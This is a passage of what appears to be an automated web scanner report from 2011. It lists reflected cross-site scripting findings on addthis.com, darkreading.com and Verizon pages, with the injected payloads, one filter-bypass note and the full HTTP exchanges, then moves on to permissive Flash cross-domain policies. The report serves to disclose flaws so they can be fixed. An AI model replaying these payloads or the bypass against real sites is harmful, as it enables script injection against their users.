2.35. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98 was submitted in the Referer HTTP header. This input was echoed as 7d308";alert(1)//c3e59b6da98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93336

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98";addthis_title="7d308";alert(1)//c3e59b6da98 - 1 search";
var services = { 'facebook_comment':"Facebook Comment", 'facebook_uncomment':"Facebook Uncomment", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com"
...[SNIP]...

2.36. http://www.darkreading.com/security/attacks/showArticle.jhtml [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /security/attacks/showArticle.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16cda"-alert(1)-"07a09eb662a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16cda"-alert(1)-"07a09eb662a
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 12:36:26 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 47313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title> - Dark R
...[SNIP]...
hannel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="attacks";
s.prop6="";
s.prop7="";
s.prop8="50.23.123.106 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16cda"-alert(1)-"07a09eb662a";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
...[SNIP]...

2.37. http://search.verizon.com/ [vsrecentsearches cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The value of the vsrecentsearches cookie is copied into the HTML document as plain text between tags. The payload 92222<script>alert(1)</script>b03d1d885ac was submitted in the vsrecentsearches cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=92222<script>alert(1)</script>b03d1d885ac; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:13 GMT
Server: Atomz/1.0
Set-Cookie: vsrecentsearches=wss~92222%3cscript%3ealert(1)%3c/script%3eb03d1d885ac~~~; domain=.verizon.com; path=/; expires=Sun, 04-Dec-2011 22:19:13 GMT
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70437


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<!-- mp_trans_searchkwd_start -->92222<script>alert(1)</script>b03d1d885ac<!-- mp_trans_searchkwd_end -->
...[SNIP]...

2.38. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/fiostv

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload b7216<script>alert(1)</script>473797c7535 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239446
Expires: Mon, 05 Sep 2011 22:25:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; expires=Wed, 05-Sep-2012 22:25:49 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:25:48 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=b7216<script>alert(1)</script>473797c7535; expires=Wed, 05-Sep-2012 22:25:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</strong> b7216<script>alert(1)</script>473797c7535</span>
...[SNIP]...

2.39. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload ed395<script>alert(1)</script>fb3c84c9c0a was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230585
Expires: Mon, 05 Sep 2011 22:41:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:54 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a; expires=Wed, 05-Sep-2012 22:41:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</script>af81f92fd39ed395<script>alert(1)</script>fb3c84c9c0a</span>
...[SNIP]...

2.40. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8c87a<script>alert(1)</script>bdc568c71ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=100108c87a<script>alert(1)</script>bdc568c71ed; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230626
Expires: Mon, 05 Sep 2011 22:41:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:52 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; expires=Wed, 05-Sep-2012 22:41:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</strong>, 100108c87a<script>alert(1)</script>bdc568c71ed</span>
...[SNIP]...

3. Flash cross-domain policy
There are 14 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ehg-verizon.hitbox.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:51 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 23:13:51 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.2. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:42 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.3. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 05 Sep 2011 22:14:39 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.4. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

